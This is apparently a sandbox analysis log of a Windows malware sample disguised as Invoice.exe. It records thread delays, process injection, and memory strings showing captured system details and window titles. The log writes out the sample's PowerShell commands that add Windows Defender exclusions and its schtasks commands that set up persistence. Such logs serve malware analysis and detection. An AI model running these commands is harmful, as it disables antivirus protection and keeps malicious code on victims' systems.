Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199156
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199047
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198937
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198828
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198717
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198594
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198484
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198375
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198266
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198156
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198046
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1197922
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1197802
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1197672
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1197562
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1197453
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1197344
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99750
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99641
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99532
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99407
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99282
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99157
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99047
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98937
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98827
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98719
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98610
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98485
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98360
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98235
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98110
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 97985
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 97860
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 97735
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 97610
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 97485
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 97360
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 97235
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199953
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199843
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199734
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199625
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199515
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199406
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199297
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199187
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199078
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198968
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198859
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198750
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198640
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198531
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198422
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198297
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198187
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198078
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197968
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197859
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197749
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197640
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197531
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197419
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197308
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197200
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99891
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99782
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99657
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99532
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99407
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99282
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99172
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 99063
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98938
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98813
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98688
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98563
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98453
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98344
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98219
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 98110
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 97985
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 97860
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 97735
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 97610
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 97485
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 97360
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 97235
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199922
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199812
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199703
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199594
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199484
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199375
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199265
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199156
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199047
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198936
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198828
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198718
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198608
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198497
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198390
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198281
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198172
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198062
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197952
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197844
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197734
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197583
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197468
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197359
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197061
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1196952

Source: BjTxJte.exe, 00000014.00000002.1933623713.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: BjTxJte.exe, 0000001B.00000002.4153454103.0000000003297000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4175377050.000000000412B000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4175377050.000000000410B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: mTbiaISptOcg9vryPzou4ntJ5oH2PLEELIjEnD9O3qQPqRWXtqemu5sqFR393Yt6dqc1
Source: BjTxJte.exe, 0000001B.00000002.4146825705.0000000001257000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: Invoice.exe, 0000000A.00000002.4150251612.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4148031273.00000000014C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Invoice.exe, 0000000A.00000002.4174937734.0000000003AFB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wIbjGOQTVmCIQwpGOijFSUlaRpxh8KMZ1p1NJO4UUUVZkFFFFABRRRQAUUUUAJRilopg

Source: C:\Users\user\Desktop\Invoice.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Invoice.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Invoice.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe"
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe"
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Invoice.exe	Memory written: C:\Users\user\Desktop\Invoice.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Memory written: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory written: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory written: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpA865.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Users\user\Desktop\Invoice.exe "C:\Users\user\Desktop\Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Users\user\Desktop\Invoice.exe "C:\Users\user\Desktop\Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Users\user\Desktop\Invoice.exe "C:\Users\user\Desktop\Invoice.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpB8B1.tmp"
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process created: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe "C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe"
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpE34B.tmp"
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmp21D.tmp"
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"

Source: kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.0000000003209000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ..129.152.220<br><hr><b>[ Program Manager]</b> (26/04/2024 22:24:0=
Source: Invoice.exe, 0000000A.00000002.4154310279.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000031A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000031B4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @\fqDTime: 05/25/2024 10:29:35<br>User Name: user<br>Computer Name: 445817<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 102.129.152.220<br><hr><b>[ Program Manager]</b> (26/04/2024 22:24:08)<br>{Win}r
Source: kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000031B4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Time: 05/25/2024 10:29:35<br>User Name: user<br>Computer Name: 445817<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 102.129.152.220<br><hr><b>[ Program Manager]</b> (26/04/2024 22:24:08)<br>{Win}rTefqLA
Source: kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.0000000003209000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: .129.152.220<br><hr><b>[ Program Manager]</b> (26/04/2024 22:24:0=
Source: kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000031A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $fq3<b>[ Program Manager]</b> (26/04/2024 22:24:08)<br>
Source: kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000031A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRfqD
Source: kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000031A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $fq9<b>[ Program Manager]</b> (26/04/2024 22:24:08)<br>{Win}rTHkq
Source: kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000031B4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Time: 05/25/2024 10:29:35<br>User Name: user<br>Computer Name: 445817<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 102.129.152.220<br><hr><b>[ Program Manager]</b> (26/04/2024 22:24:08)<br>{Win}r
Source: kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000031A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $fq8<b>[ Program Manager]</b> (26/04/2024 22:24:08)<br>{Win}THkq

Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Users\user\Desktop\Invoice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
